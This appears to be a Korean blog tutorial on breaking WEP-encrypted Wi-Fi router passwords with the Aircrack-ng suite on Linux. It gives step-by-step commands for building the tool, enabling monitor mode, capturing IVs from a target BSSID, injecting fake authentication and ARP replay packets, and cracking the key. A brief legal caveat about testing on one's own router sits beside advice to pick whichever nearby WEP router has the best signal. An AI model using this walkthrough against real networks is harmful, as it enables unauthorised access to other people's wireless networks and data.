무선 공유기 암호를 설정할 때 WEP,  WPA2 등의 다양한 암호 설정 방식이 존재합니다.

이중에 WEP는 입력되어야하는 Key의 길이가 짧아서, 기억하는 것과 입력하기 쉬운,  편함을 추구하는 저와 같은 사람에게는 매우 유용하다고(?) 할수 있습니다.

 

사실 대부분은 WEP를 사용하지 않습니다 .  보통은 암호를 걸지 않거나, WPA2 형태를 더 많이 사용하는것 같습니다.

 

이번에는 기초 단계인 WEP 방식의 암호를 깨는 것으로 시작하겠습니다.

[주의]  따라하다 걸리면, 법적 책임은 본인에게 있으므로, 집에서 본인 소유의 공유기로 테스트 해보세요.

 

윈도우 환경에서도 할 수 있는것 같은데, 리눅스 환경이 확실히 재미 있습니다.

리눅스 환경에서의 가이드 입니다. 윈도우는 훨씬 쉬울 것 같습니다.

 

다른 방법도 있을 수 있겠지만, 검색해본 결과 대체적으로 Aircrack-ng 라는 툴을 사용하는 것 같습니다.

그래서 Aircrack-ng 라는 프로그램을 설치하여, 진행하는 과정으로 설명을 하겠습니다.

참고 : http://www.aircrack-ng.org/

 

# Aircrack-ng 설치:

1. Aircrack-ng 컴파일을 위해 필요한 라이브러리 설치

–  sudo apt-get install build-essential (필요한 C/C++화일등을 인스톨)
–  sudo apt-get install libssl-dev (필요한 라이브러리 파일들을 인스톨)

 

2. Aircrack-ng 다운로드/ 설치

– mkdir aircrack (폴더 생성)
– cd aircrack
– wget http://download.aircrack-ng.org/aircrack-ng-1.1.tar.gz (Aircrack파일을 다운로드)
– tar -zxvf aircrack-ng-1.1.tar.gz (받은 파일 압축 풀기)
– cd aircrack-ng-1.1
– sudo gedit common.mak (에디트로 common.mak를 수정한다)
CFLAGS ?= -g -W – Wall -Werror -03 (이 문장을 아래와 같이 수정합니다.)
CFLAGS ?= -g -W – Wall -03(수정된 모습)
– make  (수정된 common.mak를 다시 적용)
– sudo make install (마지막으로 컴파일)

 

# Aircrack-ng 를 이용하여 암호 찾기 :

–  iwconfig (무선랜의 설정, MAC 주소 및 IP주소등을 확인, 무선랜 장치 확인)
–  airmon-ng stop wlan0  (무선랜 카드를 정지)
–  airmon-ng start wlan0 (무선랜 카드를 다시 가동 시켜 모니터 모드로 활성화함)
–  airodump-ng mon0 (주변에 무선 공유기들을 모니터링 하게 됨)
(mon0은 모니터 모드로 활성화 할때, 결과값으로 보이는 장치명 입니다. )

–  이중에서 WEP로 암호화된 공유기를 찾습니다. 가장 잘 잡히는 걸로…
–  Ctrl+C로 중지하고, 해당 공유기의 MAC 주소, 채널(CH), SSID를 복사해 둡니다.

–  IV 캡쳐
airodump-ng -c 1 –bssid 00:02:CF:BB:C3:93 -w dump mon0
-c 다음 인자는 채널
-bssid 다음 인자는 MAC주소
-w 다음 인자는 캡쳐된 정보를 저장할 파일명

 

– 위 명령을 계속 구동하고 있는 상태에서 새로운 터미널을 실행하고, 위와 같은 경로로 이동합니다.

aireplay-ng -1 0 -e KT_WLAN -a 00:02:CF:BB:C3:93 -h 11:22:33:44:55:66 mon0
-1은 거짓 인증 요청된 플랙
0은 거짓 인증값의 수
-e는 SSID 값
-a는 Mac 주소
-h는 캐치한 Mac 주소를 함께 공유할 주소

(-e, -a 의 SSID, 공유기의 MAC주소만 변경하면 됩니다)
aireplay-ng -3 -b 00:02:CF:BB:C3:93 -h 11:22:33:44:55:66 mon0
-b는 Mac 주소
-h는 캐치한 Mac 주소를 함께 공유할 주소

–  2분 정도 돌리고, Ctrl + C 로 중지합니다.

–  aircrack-ng -z *.cap
( 이 명령을 실행하면,  비밀번호와 일치할 확률값이 나옵니다. 집에서 해보니 100% 이더라구요)

– 못 찾으면 aireplay-ng -3 -b 00:02:CF:BB:C3:93 -h 11:22:33:44:55:66 mon0  이 명령을 더 오래 돌리시면 됩니다.

 

<끝>